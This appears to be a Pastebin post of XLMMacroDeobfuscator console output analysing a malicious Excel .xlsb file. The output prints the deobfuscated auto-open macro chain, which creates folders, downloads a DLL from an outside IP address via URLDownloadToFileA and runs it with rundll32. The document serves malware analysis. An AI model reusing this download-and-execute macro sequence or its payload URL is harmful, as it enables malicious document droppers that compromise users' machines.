API tools faq
paste
dissectmalware

XLSB - Result

dissectmalware
Oct 18th, 2020
720
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.80 KB | None | 0 0
raw download clone embed print report
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\7c309387537899f2c0989dcdcc65e21bff85588343800fbbee0d8d36f7aeb155.xlsb
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\7c309387537899f2c0989dcdcc65e21bff85588343800fbbee0d8d36f7aeb155.xlsb
  24.  
  25. Unencrypted xlsb file
  26.  
  27. [Loading Cells]
  28. auto_open: auto_open->WSH!$IM$497
  29. [Starting Deobfuscation]
  30. CELL:IM497 , FullEvaluation , $E$456()
  31. CELL:E456 , FullEvaluation , SET.NAME(lynumxcbqnhz,http://205.185.113.20/cXQT5g)
  32. CELL:E457 , FullEvaluation , SET.NAME(wspntpbftoqz,$BB$54)
  33. CELL:E458 , FullEvaluation , $GZ$12()
  34. CELL:GZ12 , FullEvaluation , FORMULA(http://205.185.113.20/cXQT5g,$BB$54)
  35. CELL:E459 , FullEvaluation , RUN(WSH!GV439)
  36. CELL:GV439 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr\NBKhcGI\zalfxuR.dll,DllRegisterServer)
  37. CELL:GV440 , FullEvaluation , SET.NAME(wspntpbftoqz,$AQ$173)
  38. CELL:GV441 , FullEvaluation , $GZ$12()
  39. CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr\NBKhcGI\zalfxuR.dll,DllRegisterServer,$AQ$173)
  40. CELL:GV442 , FullEvaluation , RUN(WSH!IL434)
  41. CELL:IL434 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr\NBKhcGI\zalfxuR.dll)
  42. CELL:IL435 , FullEvaluation , SET.NAME(wspntpbftoqz,$HR$332)
  43. CELL:IL436 , FullEvaluation , $GZ$12()
  44. CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr\NBKhcGI\zalfxuR.dll,$HR$332)
  45. CELL:IL437 , FullEvaluation , RUN(WSH!R272)
  46. CELL:R272 , FullEvaluation , SET.NAME(lynumxcbqnhz,URLMON)
  47. CELL:R273 , FullEvaluation , SET.NAME(wspntpbftoqz,$BE$21)
  48. CELL:R274 , FullEvaluation , $GZ$12()
  49. CELL:GZ12 , FullEvaluation , FORMULA(URLMON,$BE$21)
  50. CELL:R275 , FullEvaluation , RUN(WSH!AQ366)
  51. CELL:AQ366 , FullEvaluation , SET.NAME(lynumxcbqnhz,URLDownloadToFileA)
  52. CELL:AQ367 , FullEvaluation , SET.NAME(wspntpbftoqz,$CK$8)
  53. CELL:AQ368 , FullEvaluation , $GZ$12()
  54. CELL:GZ12 , FullEvaluation , FORMULA(URLDownloadToFileA,$CK$8)
  55. CELL:AQ369 , FullEvaluation , RUN(WSH!EM216)
  56. CELL:EM216 , FullEvaluation , SET.NAME(lynumxcbqnhz,JJCCJJ)
  57. CELL:EM217 , FullEvaluation , SET.NAME(wspntpbftoqz,$DF$227)
  58. CELL:EM218 , FullEvaluation , $GZ$12()
  59. CELL:GZ12 , FullEvaluation , FORMULA(JJCCJJ,$DF$227)
  60. CELL:EM219 , FullEvaluation , RUN(WSH!AB224)
  61. CELL:AB224 , FullEvaluation , SET.NAME(lynumxcbqnhz,Shell32)
  62. CELL:AB225 , FullEvaluation , SET.NAME(wspntpbftoqz,$AE$234)
  63. CELL:AB226 , FullEvaluation , $GZ$12()
  64. CELL:GZ12 , FullEvaluation , FORMULA(Shell32,$AE$234)
  65. CELL:AB227 , FullEvaluation , RUN(WSH!FR415)
  66. CELL:FR415 , FullEvaluation , SET.NAME(lynumxcbqnhz,ShellExecuteA)
  67. CELL:FR416 , FullEvaluation , SET.NAME(wspntpbftoqz,$Y$205)
  68. CELL:FR417 , FullEvaluation , $GZ$12()
  69. CELL:GZ12 , FullEvaluation , FORMULA(ShellExecuteA,$Y$205)
  70. CELL:FR418 , FullEvaluation , RUN(WSH!HX379)
  71. CELL:HX379 , FullEvaluation , SET.NAME(lynumxcbqnhz,JJCCCCJ)
  72. CELL:HX380 , FullEvaluation , SET.NAME(wspntpbftoqz,$IC$410)
  73. CELL:HX381 , FullEvaluation , $GZ$12()
  74. CELL:GZ12 , FullEvaluation , FORMULA(JJCCCCJ,$IC$410)
  75. CELL:HX382 , FullEvaluation , RUN(WSH!FM120)
  76. CELL:FM120 , FullEvaluation , SET.NAME(lynumxcbqnhz,Open)
  77. CELL:FM121 , FullEvaluation , SET.NAME(wspntpbftoqz,$BV$426)
  78. CELL:FM122 , FullEvaluation , $GZ$12()
  79. CELL:GZ12 , FullEvaluation , FORMULA(Open,$BV$426)
  80. CELL:FM123 , FullEvaluation , RUN(WSH!FB326)
  81. CELL:FB326 , FullEvaluation , SET.NAME(lynumxcbqnhz,regsvr32.exe)
  82. CELL:FB327 , FullEvaluation , SET.NAME(wspntpbftoqz,$GO$283)
  83. CELL:FB328 , FullEvaluation , $GZ$12()
  84. CELL:GZ12 , FullEvaluation , FORMULA(regsvr32.exe,$GO$283)
  85. CELL:FB329 , FullEvaluation , RUN(WSH!R419)
  86. CELL:R419 , FullEvaluation , SET.NAME(lynumxcbqnhz,rundll32.exe)
  87. CELL:R420 , FullEvaluation , SET.NAME(wspntpbftoqz,$AK$271)
  88. CELL:R421 , FullEvaluation , $GZ$12()
  89. CELL:GZ12 , FullEvaluation , FORMULA(rundll32.exe,$AK$271)
  90. CELL:R422 , FullEvaluation , RUN(WSH!IF482)
  91. CELL:IF482 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr)
  92. CELL:IF483 , FullEvaluation , SET.NAME(wspntpbftoqz,$ED$307)
  93. CELL:IF484 , FullEvaluation , $GZ$12()
  94. CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr,$ED$307)
  95. CELL:IF485 , FullEvaluation , RUN(WSH!FX105)
  96. CELL:FX105 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr\NBKhcGI)
  97. CELL:FX106 , FullEvaluation , SET.NAME(wspntpbftoqz,$BY$47)
  98. CELL:FX107 , FullEvaluation , $GZ$12()
  99. CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr\NBKhcGI,$BY$47)
  100. CELL:FX108 , FullEvaluation , RUN(WSH!AM67)
  101. CELL:AM67 , FullEvaluation , SET.NAME(lynumxcbqnhz,Kernel32)
  102. CELL:AM68 , FullEvaluation , SET.NAME(wspntpbftoqz,$AP$48)
  103. CELL:AM69 , FullEvaluation , $GZ$12()
  104. CELL:GZ12 , FullEvaluation , FORMULA(Kernel32,$AP$48)
  105. CELL:AM70 , FullEvaluation , RUN(WSH!HD278)
  106. CELL:HD278 , FullEvaluation , SET.NAME(lynumxcbqnhz,CreateDirectoryA)
  107. CELL:HD279 , FullEvaluation , SET.NAME(wspntpbftoqz,$DW$422)
  108. CELL:HD280 , FullEvaluation , $GZ$12()
  109. CELL:GZ12 , FullEvaluation , FORMULA(CreateDirectoryA,$DW$422)
  110. CELL:HD281 , FullEvaluation , RUN(WSH!FU460)
  111. CELL:FU460 , FullEvaluation , SET.NAME(lynumxcbqnhz,JCJ)
  112. CELL:FU461 , FullEvaluation , SET.NAME(wspntpbftoqz,$CC$99)
  113. CELL:FU462 , FullEvaluation , $GZ$12()
  114. CELL:GZ12 , FullEvaluation , FORMULA(JCJ,$CC$99)
  115. CELL:FU463 , FullEvaluation , RUN(WSH!IM53)
  116. CELL:IM53 , FullEvaluation , SET.NAME(lynumxcbqnhz,INSENG)
  117. CELL:IM54 , FullEvaluation , SET.NAME(wspntpbftoqz,$FX$188)
  118. CELL:IM55 , FullEvaluation , $GZ$12()
  119. CELL:GZ12 , FullEvaluation , FORMULA(INSENG,$FX$188)
  120. CELL:IM56 , FullEvaluation , RUN(WSH!EN497)
  121. CELL:EN497 , FullEvaluation , SET.NAME(lynumxcbqnhz,DownloadFile)
  122. CELL:EN498 , FullEvaluation , SET.NAME(wspntpbftoqz,$EC$116)
  123. CELL:EN499 , FullEvaluation , $GZ$12()
  124. CELL:GZ12 , FullEvaluation , FORMULA(DownloadFile,$EC$116)
  125. CELL:EN500 , FullEvaluation , RUN(WSH!Y5)
  126. CELL:Y5 , FullEvaluation , SET.NAME(lynumxcbqnhz,BCCJ)
  127. CELL:Y6 , FullEvaluation , SET.NAME(wspntpbftoqz,$EZ$466)
  128. CELL:Y7 , FullEvaluation , $GZ$12()
  129. CELL:GZ12 , FullEvaluation , FORMULA(BCCJ,$EZ$466)
  130. CELL:Y8 , FullEvaluation , RUN(WSH!EJ144)
  131. CELL:EJ144 , FullEvaluation , SET.NAME(lynumxcbqnhz,NIlBTnHC)
  132. CELL:EJ145 , FullEvaluation , SET.NAME(wspntpbftoqz,$HQ$304)
  133. CELL:EJ146 , FullEvaluation , $GZ$12()
  134. CELL:GZ12 , FullEvaluation , FORMULA(NIlBTnHC,$HQ$304)
  135. CELL:EJ147 , FullEvaluation , RUN(WSH!CJ205)
  136. CELL:CJ205 , FullEvaluation , SET.NAME(lynumxcbqnhz,VBKLJOys)
  137. CELL:CJ206 , FullEvaluation , SET.NAME(wspntpbftoqz,$IB$431)
  138. CELL:CJ207 , FullEvaluation , $GZ$12()
  139. CELL:GZ12 , FullEvaluation , FORMULA(VBKLJOys,$IB$431)
  140. CELL:CJ208 , FullEvaluation , RUN(WSH!BT60)
  141. CELL:BT60 , FullEvaluation , SET.NAME(lynumxcbqnhz,JnBzQTWO)
  142. CELL:BT61 , FullEvaluation , SET.NAME(wspntpbftoqz,$HZ$410)
  143. CELL:BT62 , FullEvaluation , $GZ$12()
  144. CELL:GZ12 , FullEvaluation , FORMULA(JnBzQTWO,$HZ$410)
  145. CELL:BT63 , FullEvaluation , $IM$498()
  146. CELL:IM498 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\nMEzMcr",0)
  147. CELL:IM499 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\nMEzMcr\NBKhcGI",0)
  148. CELL:IM501 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://205.185.113.20/cXQT5g","C:\nMEzMcr\NBKhcGI\zalfxuR.dll",0,0)
  149. CELL:IM503 , FullEvaluation , IF($IM$502<>0)
  150. CELL:IM504 , FullEvaluation , CALL("INSENG","DownloadFile","BCCJ","http://205.185.113.20/cXQT5g","C:\nMEzMcr\NBKhcGI\zalfxuR.dll",1)
  151. CELL:IM506 , FullEvaluation , END.IF
  152. CELL:IM508 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\nMEzMcr\NBKhcGI\zalfxuR.dll,DllRegisterServer",0,0)
  153. CELL:IM511 , End , HALT()
  154.  
  155. Files:
  156.  
  157. [END of Deobfuscation]
  158. time elapsed: 1.2602179050445557
  159.  
  160. Process finished with exit code 0
  161.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!